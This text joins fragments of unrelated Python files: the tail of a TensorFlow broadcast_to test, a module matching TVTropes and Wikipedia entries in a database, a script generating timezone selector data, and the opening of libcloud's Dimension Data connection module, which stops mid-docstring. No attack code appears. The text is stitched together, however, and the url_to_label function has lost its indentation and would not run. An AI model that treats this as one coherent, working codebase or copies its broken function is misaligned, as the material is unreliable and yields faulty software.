          expected=x)
      self._testBinary(
          array_ops.broadcast_to,
          x,
          np.array([6, 6], dtype=np.int32),
          expected=np.tile(x, [3, 2]))
      self._testBinary(
          array_ops.broadcast_to,
          x,
          np.array([7, 4, 3], dtype=np.int32),
          expected=np.tile(x, [7, 2, 1]))
      # Broadcasting into a zero-size dimension yields an empty result.
      self._testBinary(
          array_ops.broadcast_to,
          x,
          np.array([7, 0, 3], dtype=np.int32),
          expected=np.zeros([7, 0, 3], dtype=dtype))
      # NOTE(review): (2, 3) -> (7, 1, 2, 9) multiplies the trailing
      # dimensions rather than matching them, which numpy broadcasting
      # would reject -- presumably this relies on the op's tiling
      # behavior; confirm against the kernel.
      self._testBinary(
          array_ops.broadcast_to,
          x,
          np.array([7, 1, 2, 9], dtype=np.int32),
          expected=np.tile(x, [7, 1, 1, 3]))
      self._testBinary(
          array_ops.broadcast_to,
          np.zeros([2, 0], dtype=dtype),
          np.array([4, 0], dtype=np.int32),
          expected=np.zeros([4, 0], dtype=dtype))
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  googletest.main()
| |
""":mod:`cliche.services.align` --- String matching to align
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import difflib
from urllib.parse import unquote_plus
from sqlalchemy import ForeignKeyConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.schema import Column, ForeignKey
from sqlalchemy.sql import func
from sqlalchemy.types import Integer, String
from ..name import Name
from ..orm import Base
from ..sqltypes import HashableLocale as Locale
from ..web.app import app
from ..web.db import session
from ..work import Work
from .tvtropes.entities import ClicheTvtropesEdge, Entity as Tvtropes
from .wikipedia.work import ClicheWikipediaEdge, Entity as Wikipedia
class ExternalId(Base):
    """Cross-service identity record linking one :class:`cliche.work.Work`
    to its TVTropes entity (identified by namespace + name) and/or its
    Wikipedia entity.

    This class can be replaced based on the probability of equality.
    """

    #: (:class:`int`) The primary key integer.
    id = Column(Integer, primary_key=True)
    #: (:class:`int`) foreignkey for works.id
    work_id = Column(Integer, ForeignKey('works.id'), nullable=False)
    #: (:class:`collections.abc.MutableSet`) The set of
    #: :class:`cliche.work.Entity`.
    work = relationship(lambda: Work)
    #: (:class:`str`) The namespace of the trope,
    #: both namespace and name determines one trope.
    tvtropes_namespace = Column(String)
    #: (:class:`str`) The name of the trope.
    tvtropes_name = Column(String)
    #: (:class:`collections.abc.MutableSet`) The set of
    #: :class:`cliche.services.tvtropes.entities.Entity`.
    tvtropes = relationship('cliche.services.tvtropes.entities.Entity')
    #: (:class:`str`) The namespace of the trope.
    wikipedia_id = Column(String, ForeignKey('wikipedia_entities.name'))
    #: (:class:`collections.abc.MutableSet`) The set of
    #: :class:`cliche.services.wikipedia.work.Entity`.
    wikipedia = relationship('cliche.services.wikipedia.work.Entity')

    __tablename__ = 'external_ids'
    # Composite FK: (namespace, name) together identify one trope row.
    __table_args__ = (
        ForeignKeyConstraint(
            [tvtropes_namespace, tvtropes_name],
            [Tvtropes.namespace, Tvtropes.name]
        ),
    )
def normalize(name):
    """Return *name* lower-cased with surrounding whitespace removed."""
    return name.lower().strip()
def url_to_label(url):
if url:
label = unquote_plus(url[28:].replace('_', ' ')).strip().lower()
return label.split('(')[0]
else:
return None
def is_same(a_, b_):
    """Return whether two strings are near-duplicates.

    Compares with :class:`difflib.SequenceMatcher` and treats a
    similarity ratio strictly greater than 0.9 as "the same".

    Args:
        a_: first string.
        b_: second string.

    Returns:
        bool: ``True`` when the similarity ratio exceeds 0.9.
    """
    # Return the comparison directly instead of the redundant
    # if/else True/False of the original.
    return difflib.SequenceMatcher(None, a_, b_).ratio() > 0.9
def alignment():
    """Align TVTropes entities with Wikipedia entities by name.

    Loads both entity lists, re-keys them by normalized name, and walks
    them in sorted order like a merge join.  Near-equal names (per
    :func:`is_same`) produce one shared :class:`cliche.work.Work` plus an
    :class:`ExternalId` row linking both sources; otherwise each side gets
    its own Work and a cross-service confidence edge, and the
    lexicographically smaller side advances.  Stops when either iterator
    is exhausted.
    """
    with app.app_context():
        tvtropes_list = session \
            .query(Tvtropes.name, Tvtropes.namespace) \
            .order_by(Tvtropes.name).all()
        wikipedia_list = session \
            .query(Wikipedia.name, Wikipedia.label, Wikipedia.type) \
            .order_by(Wikipedia.name).all()
    # Re-key both sides as (normalized-name, original-key, extra) triples
    # so tuple sorting and the merge walk below compare normalized names.
    wikipedia_list = [(url_to_label(x[0]), x[0], x[2]) for x in wikipedia_list]
    tvtropes_list = [(normalize(x[0]), x[0], x[1]) for x in tvtropes_list]
    wikipedia_list.sort()
    tvtropes_list.sort()
    tv_iter = iter(tvtropes_list)
    wiki_iter = iter(wikipedia_list)
    trope = next(tv_iter)
    wiki = next(wiki_iter)
    while(True):
        try:
            if is_same(trope[0], wiki[0]):
                print(trope[0], wiki[0])
                with app.app_context():
                    work = Work(media_type=wiki[2])
                    work.names.update({
                        Name(nameable=work,
                             name=trope[0],
                             locale=Locale.parse('en_US'))
                    })
                    # NOTE(review): work.id is read before the Work has
                    # been flushed, so work_id is presumably None here and
                    # the FK gets populated via the `work` relationship
                    # instead -- confirm.
                    external_id = ExternalId(
                        work_id=work.id,
                        work=work,
                        wikipedia_id=wiki[1],
                        wikipedia=session
                        .query(Wikipedia)
                        .filter(Wikipedia.name.like(wiki[1]))
                        .first(),
                        tvtropes_name=trope[1],
                        tvtropes_namespace=trope[2],
                        tvtropes=session
                        .query(Tvtropes)
                        .filter(
                            Tvtropes.name.like(trope[1]),
                            Tvtropes.namespace.like(trope[2]))
                        .first()
                    )
                    with session.begin():
                        session.add_all([work, external_id])
            else:
                # No name match: record each side as its own Work with a
                # cross-service edge so a later matching pass can decide.
                with app.app_context():
                    wikipedia_work = Work(media_type=wiki[2])
                    wikipedia_work.names.update({
                        Name(nameable=wikipedia_work,
                             name=wiki[0],
                             locale=Locale.parse('en_US'))
                    })
                    wikipedia_edge = ClicheWikipediaEdge(
                        cliche_work=wikipedia_work,
                        wikipedia_name=wiki[1],
                        wikipedia_work=session.query(Wikipedia).
                        filter_by(name=wiki[1]).first()
                    )
                    tvtropes_work = Work(media_type='work')
                    tvtropes_work.names.update({
                        Name(nameable=tvtropes_work,
                             name=trope[0],
                             locale=Locale.parse('en_US'))
                    })
                    tvtropes_edge = ClicheTvtropesEdge(
                        cliche_work=tvtropes_work,
                        tvtropes_namespace=trope[2],
                        tvtropes_name=trope[1],
                        tvtropes_entity=session.query(Tvtropes).
                        filter_by(name=trope[1], namespace=trope[2]).first()
                    )
                    with session.begin():
                        session.add_all([wikipedia_work, tvtropes_work,
                                         wikipedia_edge, tvtropes_edge])
            # Advance the side whose normalized name sorts lower.
            if trope[0] > wiki[0]:
                wiki = next(wiki_iter)
            else:
                trope = next(tv_iter)
        except StopIteration:
            break
def matching_from_cliche_tvtropes_edges():
    """Yield cliche-tvtropes edges greedily, highest confidence first.

    Marks every edge as available, then repeatedly picks a
    highest-confidence available edge and retires all competing edges
    that share either of its endpoints -- a greedy one-to-one matching
    between cliche works and TVTropes entities.
    """
    # assume there are a few cliche-tvtropes edges
    with app.app_context():
        with session.begin():
            session.query(ClicheTvtropesEdge).update({'available': True})
        while True:
            max_conf = session \
                .query(func.max(ClicheTvtropesEdge.confidence)) \
                .filter_by(available=True) \
                .scalar()
            # No available edge remains (or max confidence is falsy).
            if not max_conf:
                break
            matching = session \
                .query(ClicheTvtropesEdge) \
                .filter_by(confidence=max_conf, available=True) \
                .first()
            cliche_work = matching.cliche_work
            tvtropes_entity = matching.tvtropes_entity
            # Retire every other edge touching either chosen endpoint.
            session.query(ClicheTvtropesEdge) \
                .filter_by(cliche_work=cliche_work,
                           available=True) \
                .update({'available': False})
            session.query(ClicheTvtropesEdge) \
                .filter_by(tvtropes_entity=tvtropes_entity,
                           available=True) \
                .update({'available': False})
            yield matching
def matching_from_cliche_wikipedia_edges():
    """Yield cliche-wikipedia edges greedily, highest confidence first.

    Same greedy one-to-one matching as
    :func:`matching_from_cliche_tvtropes_edges`, applied to the
    cliche-wikipedia edge table.
    """
    # assume there are a few cliche-wikipedia edges
    with app.app_context():
        with session.begin():
            session.query(ClicheWikipediaEdge).update({'available': True})
        while True:
            max_conf = session \
                .query(func.max(ClicheWikipediaEdge.confidence)) \
                .filter_by(available=True) \
                .scalar()
            # No available edge remains (or max confidence is falsy).
            if not max_conf:
                break
            matching = session \
                .query(ClicheWikipediaEdge) \
                .filter_by(confidence=max_conf, available=True) \
                .first()
            cliche_work = matching.cliche_work
            wikipedia_work = matching.wikipedia_work
            # Retire every other edge touching either chosen endpoint.
            session.query(ClicheWikipediaEdge) \
                .filter_by(cliche_work=cliche_work,
                           available=True) \
                .update({'available': False})
            session.query(ClicheWikipediaEdge) \
                .filter_by(wikipedia_work=wikipedia_work,
                           available=True) \
                .update({'available': False})
            yield matching
| |
import os
import re
import math
import json
from itertools import chain
from xml.etree import cElementTree as et
# Run relative to this script's directory so the 'raw/' data files and the
# XML inputs below resolve regardless of the caller's working directory.
os.chdir(os.path.abspath(os.path.dirname(__file__)))
def convert_countries():
    """Parse raw/countryInfo.txt into a dict keyed by country code.

    Each value is a dict with 'name', 'capital', and 'code' keys.
    Blank lines and '#' comment lines are skipped.
    """
    countries = {}
    with open('raw/countryInfo.txt', 'rb') as f:
        for raw_line in f:
            fields = raw_line.decode('utf-8').strip().split('\t')
            if not fields or fields[0].startswith('#'):
                continue
            code = fields[0]
            countries[code] = {
                'name': fields[4],
                'capital': fields[5],
                'code': code
            }
    return countries
def convert_cities():
    """Parse raw/cities15000.txt into a dict of city records.

    Keys look like 'COUNTRY/City_Name' (plus '/STATE' for US cities)
    with spaces replaced by underscores.  When two rows map to the same
    key, the entry with the larger population wins.
    """
    cities = {}
    with open('raw/cities15000.txt', 'rb') as f:
        for raw_line in f:
            fields = raw_line.decode('utf-8').strip().split('\t')
            if not fields:
                continue
            main_name = fields[2]
            country = fields[8]
            # Only US cities carry a state component (may still be empty).
            state = country == 'US' and fields[10] or None
            population = int(fields[14])
            timezone = fields[17]
            # Feature code PPLC marks a capital city.
            is_capital = fields[7] == 'PPLC'
            city_key = ('%s/%s%s' % (country, main_name,
                                     state and '/' + state or '')).replace(' ', '_')
            old_city = cities.get(city_key)
            # There was already a city with that name, let the one
            # with the higher population win.
            if old_city is not None and population < old_city['population']:
                continue
            cities[city_key] = {
                'country': country,
                'state': state,
                'name': main_name,
                'timezone': timezone,
                'population': population,
                'is_capital': is_capital,
            }
    return cities
def find_windows_zones():
    """Map Windows timezone display names to tz database names.

    Reads the CLDR windows_zones.xml file and, for each mapZone that
    covers the whole world (territory '001'), keeps the first tz name
    listed in its 'type' attribute.
    """
    mapping = {}
    tree = et.parse('windows_zones.xml')
    zone_path = './/windowsZones/mapTimezones/mapZone'
    for node in tree.findall(zone_path):
        if node.attrib.get('territory') != '001':
            continue
        mapping[node.attrib['other']] = node.attrib['type'].split(None)[0]
    return mapping
def find_weekend_info():
    """Extract per-territory weekend start/end days from CLDR data.

    Returns ``{'start': {territory: day}, 'end': {territory: day}}``
    where day is 0 (Sunday) through 6 (Saturday).
    """
    days = ['sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat']
    tree = et.parse('supplemental_data.xml')
    rv = {'start': {}, 'end': {}}
    for tag, bucket in (('weekendStart', 'start'), ('weekendEnd', 'end')):
        for node in tree.findall('.//%s' % tag):
            day = days.index(node.attrib['day'])
            for territory in node.attrib['territories'].split():
                rv[bucket][territory] = day
    return rv
def combine_data(countries, cities, timezone_data, windows_zones, weekends):
    """Merge all raw data sources into the final structure for the JS app.

    :param countries: mapping produced by ``convert_countries()``
    :param cities: mapping produced by ``convert_cities()``
    :param timezone_data: parsed timezones.json ('zones' and 'links' lists
        of pipe-separated strings)
    :param windows_zones: mapping produced by ``find_windows_zones()``
    :param weekends: mapping produced by ``find_weekend_info()``
    """
    selectables = []
    timezones_found = set()
    # tz name -> index into timezone_data['zones'].  NOTE(review): the
    # sequential index assignment assumes 'zones' has no duplicate names;
    # a duplicate would shift later indices — confirm against the input.
    timezone_mapping = {}
    for tzinfo in timezone_data['zones']:
        tz = tzinfo.split('|')[0]
        if tz not in timezone_mapping:
            timezone_mapping[tz] = len(timezone_mapping)
    # Aliases ('links') reuse the index of their target zone.
    for tzlink in timezone_data['links']:
        target, tz = tzlink.split('|')
        timezone_mapping[tz] = timezone_mapping[target]
    reverse_timezone_mapping = dict((v, k) for k, v in
                                    timezone_mapping.iteritems())
    def get_tz_tokens(tz):
        # super shitty way to guess the timezone abbreviations. Totally
        # does not work for many of them.
        rv = ''
        # NOTE(review): 'links' is a *list* of 'Target|Alias' strings, so
        # this membership test only matches a complete 'a|b' string and
        # the list indexing below would then raise TypeError.  Looks like
        # it was written for a dict — confirm the branch is dead.
        if tz in timezone_data['links']:
            tz = timezone_data['links'][tz]
        zone = timezone_data['zones'][timezone_mapping[tz]].split('|')
        for abbr in zone[1].split(None):
            rv += ' ' + abbr
        rv = rv.replace('/', ' ')
        # reject obvious wrong ones. obviously the above code can
        # generate invalid abbreviations.
        return [x for x in set(rv.lower().split()) if len(x) > 2]
    def record_selectable(key, name, full_name, tz,
                          country=None, common_tz=False, sortinfo=None):
        # Search tokens: words of the display name plus guessed tz
        # abbreviations.  'sortinfo' is only used for ordering and is
        # stripped before the data is returned.
        tokens = set(re.sub('[^\s\w]', '', full_name.lower()).split())
        tokens.update(get_tz_tokens(tz))
        rv = {
            'k': key,
            'd': full_name,
            'z': timezone_mapping[tz],
            'T': ' '.join(sorted(tokens)),
            'sortinfo': sortinfo or {},
        }
        if name != full_name:
            rv['n'] = name
        if country is not None:
            rv['c'] = country
        if common_tz:
            rv['C'] = 1
        selectables.append(rv)
    # One selectable per city, keyed 'country:city[:state]' slugified.
    for city in cities.itervalues():
        key = \
            city['country'].lower() + ':' + \
            (city['name'] + ':' + (city['state'] or '')).rstrip(':').lower() \
            .replace(' ', '-') \
            .replace('_', '-') \
            .replace('\'', '') \
            .replace(',', '') \
            .replace('(', '') \
            .replace(')', '')
        display_parts = [countries[city['country']]['name']]
        if city['state']:
            display_parts.append(city['state'])
        display_parts.append(city['name'])
        record_selectable(key, city['name'], ', '.join(display_parts),
                          city['timezone'], city['country'],
                          sortinfo={'city': city})
        timezones_found.add(city['timezone'])
    # Add 'Etc/...' zones and region-less names not covered by a city.
    for name in timezone_mapping:
        if name in timezones_found or \
           not (name.lower().startswith('etc/') or not '/' in name):
            continue
        key = name.lower() \
            .replace('_', '-') \
            .replace('/', ':') \
            .replace(',', '') \
            .replace('\'', '')
        record_selectable(key, name.split('/', 1)[-1], name, name)
    # Windows timezone display names point at their canonical tz name.
    for name, tzname in windows_zones.iteritems():
        key = '-'.join(name.lower().split(None)) \
            .replace('(', '') \
            .replace(')', '') \
            .replace(',', '')
        record_selectable(key, name, name, tzname, common_tz=True)
    def _sort_key(x):
        # Entries whose initials/abbreviation appear in their own token
        # list ("canonical") sort first, then by importance (common
        # Windows zones, capitals, population), then alphabetically.
        words = x['d'].split()
        if len(words) == 1:
            canonical_abbr = words[0].lower()
        else:
            canonical_abbr = ''.join(x[:1] for x in words).lower()
        canonical = canonical_abbr in x['T'].split()
        city = x['sortinfo'].get('city')
        name = x['d'].lower()
        importance = 0
        if x.get('C'):
            importance += 5
        if city:
            if city['is_capital']:
                importance += 1
            importance += math.log(max(city['population'], 1)) / 50.0
        return not canonical, -importance, name
    selectables.sort(key=_sort_key)
    # sortinfo was only needed for ordering; drop it from the output.
    for selectable in selectables:
        selectable.pop('sortinfo', None)
    return {
        'tzmap': reverse_timezone_mapping,
        'timezones': timezone_data['zones'],
        'timezone_links': timezone_data['links'],
        'selectables': selectables,
        'weekends': weekends,
        'countries': dict((k, v['name']) for k, v in countries.iteritems()),
    }
def write_combined_data(data, f):
    """Serialize the combined data set as JavaScript statements into *f*.

    Emits three statements: the moment-timezone zone data, the zone
    links, and the timesched selectable/weekend payload.
    """
    f.write('moment.tz.add(%s);\n' % json.dumps(data['timezones']))
    f.write('moment.tz.link(%s);\n' % json.dumps(data['timezone_links']))
    payload = json.dumps({
        'tzmap': data['tzmap'],
        'selectables': data['selectables'],
        'weekends': data['weekends'],
    })
    f.write('timesched.setTimezoneData(%s);\n' % payload)
def main():
    """Build the combined timezone data set and write the generated JS."""
    countries = convert_countries()
    cities = convert_cities()
    zones_win = find_windows_zones()
    weekend_info = find_weekend_info()
    with open('timezones.json') as fp:
        timezone_data = json.load(fp)
    result = combine_data(countries, cities, timezone_data, zones_win,
                          weekend_info)
    with open('../lib/generated/data.js', 'w') as fp:
        write_combined_data(result, fp)
# Script entry point: regenerate ../lib/generated/data.js from raw data.
if __name__ == '__main__':
    main()
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Dimension Data Common Components
"""
from base64 import b64encode
from time import sleep
from libcloud.utils.py3 import httplib
from libcloud.utils.py3 import b
from libcloud.common.base import ConnectionUserAndKey, XmlResponse
from libcloud.common.types import LibcloudError, InvalidCredsError
from libcloud.compute.base import Node
from libcloud.utils.py3 import basestring
from libcloud.utils.xml import findtext
# Roadmap / TODO:
#
# 1.0 - Copied from OpSource API, named provider details.
# setup a few variables to represent all of the DimensionData cloud namespaces
# XML namespaces used by the payloads of the legacy (v1 / "oec") API.
NAMESPACE_BASE = "http://oec.api.opsource.net/schemas"
ORGANIZATION_NS = NAMESPACE_BASE + "/organization"
SERVER_NS = NAMESPACE_BASE + "/server"
NETWORK_NS = NAMESPACE_BASE + "/network"
DIRECTORY_NS = NAMESPACE_BASE + "/directory"
GENERAL_NS = NAMESPACE_BASE + "/general"
BACKUP_NS = NAMESPACE_BASE + "/backup"
# API 2.0 Namespaces and URNs
TYPES_URN = "urn:didata.com:api:cloud:types"
# API end-points
# Keyed by region id; each entry holds the human readable region name,
# the API host to contact and the white-label vendor operating it.
API_ENDPOINTS = {
    'dd-na': {
        'name': 'North America (NA)',
        'host': 'api-na.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'dd-eu': {
        'name': 'Europe (EU)',
        'host': 'api-eu.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'dd-au': {
        'name': 'Australia (AU)',
        'host': 'api-au.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'dd-au-gov': {
        'name': 'Australia Canberra ACT (AU)',
        'host': 'api-canberra.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'dd-af': {
        'name': 'Africa (AF)',
        'host': 'api-mea.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'dd-ap': {
        'name': 'Asia Pacific (AP)',
        'host': 'api-ap.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'dd-latam': {
        'name': 'South America (LATAM)',
        'host': 'api-latam.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'dd-canada': {
        'name': 'Canada (CA)',
        'host': 'api-canada.dimensiondata.com',
        'vendor': 'DimensionData'
    },
    'is-na': {
        'name': 'North America (NA)',
        'host': 'usapi.cloud.is.co.za',
        'vendor': 'InternetSolutions'
    },
    'is-eu': {
        'name': 'Europe (EU)',
        'host': 'euapi.cloud.is.co.za',
        'vendor': 'InternetSolutions'
    },
    'is-au': {
        'name': 'Australia (AU)',
        'host': 'auapi.cloud.is.co.za',
        'vendor': 'InternetSolutions'
    },
    'is-af': {
        'name': 'Africa (AF)',
        'host': 'meaapi.cloud.is.co.za',
        'vendor': 'InternetSolutions'
    },
    'is-ap': {
        'name': 'Asia Pacific (AP)',
        'host': 'apapi.cloud.is.co.za',
        'vendor': 'InternetSolutions'
    },
    'is-latam': {
        'name': 'South America (LATAM)',
        'host': 'latamapi.cloud.is.co.za',
        'vendor': 'InternetSolutions'
    },
    'is-canada': {
        'name': 'Canada (CA)',
        'host': 'canadaapi.cloud.is.co.za',
        'vendor': 'InternetSolutions'
    },
    'ntta-na': {
        'name': 'North America (NA)',
        'host': 'cloudapi.nttamerica.com',
        'vendor': 'NTTNorthAmerica'
    },
    'ntta-eu': {
        'name': 'Europe (EU)',
        'host': 'eucloudapi.nttamerica.com',
        'vendor': 'NTTNorthAmerica'
    },
    'ntta-au': {
        'name': 'Australia (AU)',
        'host': 'aucloudapi.nttamerica.com',
        'vendor': 'NTTNorthAmerica'
    },
    'ntta-af': {
        'name': 'Africa (AF)',
        'host': 'sacloudapi.nttamerica.com',
        'vendor': 'NTTNorthAmerica'
    },
    'ntta-ap': {
        'name': 'Asia Pacific (AP)',
        'host': 'hkcloudapi.nttamerica.com',
        'vendor': 'NTTNorthAmerica'
    },
    'cisco-na': {
        'name': 'North America (NA)',
        'host': 'iaas-api-na.cisco-ccs.com',
        'vendor': 'Cisco'
    },
    'cisco-eu': {
        'name': 'Europe (EU)',
        'host': 'iaas-api-eu.cisco-ccs.com',
        'vendor': 'Cisco'
    },
    'cisco-au': {
        'name': 'Australia (AU)',
        'host': 'iaas-api-au.cisco-ccs.com',
        'vendor': 'Cisco'
    },
    'cisco-af': {
        'name': 'Africa (AF)',
        'host': 'iaas-api-mea.cisco-ccs.com',
        'vendor': 'Cisco'
    },
    'cisco-ap': {
        'name': 'Asia Pacific (AP)',
        'host': 'iaas-api-ap.cisco-ccs.com',
        'vendor': 'Cisco'
    },
    'cisco-latam': {
        'name': 'South America (LATAM)',
        'host': 'iaas-api-sa.cisco-ccs.com',
        'vendor': 'Cisco'
    },
    'cisco-canada': {
        'name': 'Canada (CA)',
        'host': 'iaas-api-ca.cisco-ccs.com',
        'vendor': 'Cisco'
    },
    'med1-il': {
        'name': 'Israel (IL)',
        'host': 'api.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'med1-na': {
        'name': 'North America (NA)',
        'host': 'api-na.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'med1-eu': {
        'name': 'Europe (EU)',
        'host': 'api-eu.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'med1-au': {
        'name': 'Australia (AU)',
        'host': 'api-au.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'med1-af': {
        'name': 'Africa (AF)',
        'host': 'api-af.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'med1-ap': {
        'name': 'Asia Pacific (AP)',
        'host': 'api-ap.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'med1-latam': {
        'name': 'South America (LATAM)',
        'host': 'api-sa.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'med1-canada': {
        'name': 'Canada (CA)',
        'host': 'api-ca.cloud.med-1.com',
        'vendor': 'Med-1'
    },
    'indosat-id': {
        'name': 'Indonesia (ID)',
        'host': 'iaas-api.indosat.com',
        'vendor': 'Indosat'
    },
    'indosat-na': {
        'name': 'North America (NA)',
        'host': 'iaas-usapi.indosat.com',
        'vendor': 'Indosat'
    },
    'indosat-eu': {
        'name': 'Europe (EU)',
        'host': 'iaas-euapi.indosat.com',
        'vendor': 'Indosat'
    },
    'indosat-au': {
        'name': 'Australia (AU)',
        'host': 'iaas-auapi.indosat.com',
        'vendor': 'Indosat'
    },
    'indosat-af': {
        'name': 'Africa (AF)',
        'host': 'iaas-afapi.indosat.com',
        'vendor': 'Indosat'
    },
    'bsnl-in': {
        'name': 'India (IN)',
        'host': 'api.bsnlcloud.com',
        'vendor': 'BSNL'
    },
    'bsnl-na': {
        'name': 'North America (NA)',
        'host': 'usapi.bsnlcloud.com',
        'vendor': 'BSNL'
    },
    'bsnl-eu': {
        'name': 'Europe (EU)',
        'host': 'euapi.bsnlcloud.com',
        'vendor': 'BSNL'
    },
    'bsnl-au': {
        'name': 'Australia (AU)',
        'host': 'auapi.bsnlcloud.com',
        'vendor': 'BSNL'
    },
    'bsnl-af': {
        'name': 'Africa (AF)',
        'host': 'afapi.bsnlcloud.com',
        'vendor': 'BSNL'
    },
}
# Default API end-point for the base connection class.
DEFAULT_REGION = 'dd-na'
# (tag, namespace) pairs probed by DimensionDataResponse.parse_error to
# locate the machine readable error code in a failure response body.
BAD_CODE_XML_ELEMENTS = (
    ('responseCode', SERVER_NS),
    ('responseCode', TYPES_URN),
    ('result', GENERAL_NS)
)
# (tag, namespace) pairs probed for the human readable error message.
BAD_MESSAGE_XML_ELEMENTS = (
    ('message', SERVER_NS),
    ('message', TYPES_URN),
    ('resultDetail', GENERAL_NS)
)
def dd_object_to_id(obj, obj_type, id_value='id'):
    """
    Takes in a DD object or string and returns its id.
    This is a helper method; many of our functions can take either an
    object or a string, and we need an easy way of converting them.

    :param obj: The object to get the id for, or the id itself as a string
    :type obj: ``object`` or ``str``

    :param obj_type: The expected type of ``obj``
    :type obj_type: ``type``

    :param id_value: Name of the attribute holding the id (default ``'id'``)
    :type id_value: ``str``

    :raises TypeError: if ``obj`` is neither an ``obj_type`` nor a string

    :rtype: ``str``
    """
    if isinstance(obj, obj_type):
        return getattr(obj, id_value)
    elif isinstance(obj, basestring):
        return obj
    else:
        raise TypeError(
            "Invalid type %s looking for basestring or %s"
            % (type(obj).__name__, obj_type.__name__)
        )
class NetworkDomainServicePlan(object):
    """Service plan levels that can be assigned to a network domain."""
    ESSENTIALS = "ESSENTIALS"
    ADVANCED = "ADVANCED"
class DimensionDataResponse(XmlResponse):
    def parse_error(self):
        """
        Turn an error HTTP response into the appropriate exception.

        :raises InvalidCredsError: on 401/403 responses
        :raises DimensionDataAPIException: on 400 responses (with the
            code/message extracted from the XML body) and on any other
            non-200 status
        :return: the raw response body when the status is 200 OK
        """
        if self.status == httplib.UNAUTHORIZED:
            raise InvalidCredsError(self.body)
        elif self.status == httplib.FORBIDDEN:
            raise InvalidCredsError(self.body)
        body = self.parse_body()
        if self.status == httplib.BAD_REQUEST:
            # The error code/message live under different tags and
            # namespaces depending on the API generation; probe each
            # candidate in order and keep the first hit.
            code = None
            for tag, namespace in BAD_CODE_XML_ELEMENTS:
                code = findtext(body, tag, namespace)
                if code is not None:
                    break
            message = None
            for tag, namespace in BAD_MESSAGE_XML_ELEMENTS:
                message = findtext(body, tag, namespace)
                if message is not None:
                    break
            raise DimensionDataAPIException(code=code,
                                            msg=message,
                                            driver=self.connection.driver)
        # Was 'is not httplib.OK' — an identity comparison on an int that
        # only works because of CPython's small-int cache; use equality.
        if self.status != httplib.OK:
            raise DimensionDataAPIException(code=self.status,
                                            msg=body,
                                            driver=self.connection.driver)
        return self.body
class DimensionDataAPIException(LibcloudError):
    """Error returned by the Dimension Data API (code plus message)."""
    def __init__(self, code, msg, driver):
        self.code = code
        self.msg = msg
        self.driver = driver
    def __str__(self):
        return "%s: %s" % (self.code, self.msg)
    def __repr__(self):
        template = "<DimensionDataAPIException: code='%s', msg='%s'>"
        return template % (self.code, self.msg)
class DimensionDataConnection(ConnectionUserAndKey):
    """
    Connection class for the DimensionData driver
    """
    # URL prefixes and versions for the two API generations used below.
    api_path_version_1 = '/oec'
    api_path_version_2 = '/caas'
    api_version_1 = '0.9'
    api_version_2 = '2.2'
    # Cached organisation id, lazily resolved by _get_orgId().
    _orgId = None
    responseCls = DimensionDataResponse
    allow_insecure = False
    def __init__(self, user_id, key, secure=True, host=None, port=None,
                 url=None, timeout=None, proxy_url=None, **conn_kwargs):
        # NOTE(review): conn_kwargs['region'] is read unconditionally, so
        # callers must always pass region= (possibly falsy) or this raises
        # KeyError — confirm all call sites provide it.
        super(DimensionDataConnection, self).__init__(
            user_id=user_id,
            key=key,
            secure=secure,
            host=host, port=port,
            url=url, timeout=timeout,
            proxy_url=proxy_url)
        if conn_kwargs['region']:
            self.host = conn_kwargs['region']['host']
    def add_default_headers(self, headers):
        # Every request uses HTTP Basic auth and XML payloads.
        headers['Authorization'] = \
            ('Basic %s' % b64encode(b('%s:%s' % (self.user_id,
                                                 self.key))).decode('utf-8'))
        headers['Content-Type'] = 'application/xml'
        return headers
    def request_api_1(self, action, params=None, data='',
                      headers=None, method='GET'):
        """Issue ``action`` against the v1 API (no org id in the path)."""
        action = "%s/%s/%s" % (self.api_path_version_1,
                               self.api_version_1, action)
        return super(DimensionDataConnection, self).request(
            action=action,
            params=params, data=data,
            method=method, headers=headers)
    def request_api_2(self, path, action, params=None, data='',
                      headers=None, method='GET'):
        """Issue ``action`` against the v2 API under ``path``."""
        action = "%s/%s/%s/%s" % (self.api_path_version_2,
                                  self.api_version_2, path, action)
        return super(DimensionDataConnection, self).request(
            action=action,
            params=params, data=data,
            method=method, headers=headers)
    def request_with_orgId_api_1(self, action, params=None, data='',
                                 headers=None, method='GET'):
        """v1 request scoped to the caller's organisation id."""
        action = "%s/%s" % (self.get_resource_path_api_1(), action)
        return super(DimensionDataConnection, self).request(
            action=action,
            params=params, data=data,
            method=method, headers=headers)
    def request_with_orgId_api_2(self, action, params=None, data='',
                                 headers=None, method='GET'):
        """v2 request scoped to the caller's organisation id."""
        action = "%s/%s" % (self.get_resource_path_api_2(), action)
        return super(DimensionDataConnection, self).request(
            action=action,
            params=params, data=data,
            method=method, headers=headers)
    def paginated_request_with_orgId_api_2(self, action, params=None, data='',
                                           headers=None, method='GET',
                                           page_size=250):
        """
        A paginated request to the MCP2.0 API
        This essentially calls out to request_with_orgId_api_2 for each page
        and yields the response to make a generator
        This generator can be looped through to grab all the pages.

        :param action: The resource to access (i.e. 'network/vlan')
        :type action: ``str``

        :param params: Parameters to give to the action
        :type params: ``dict`` or ``None``

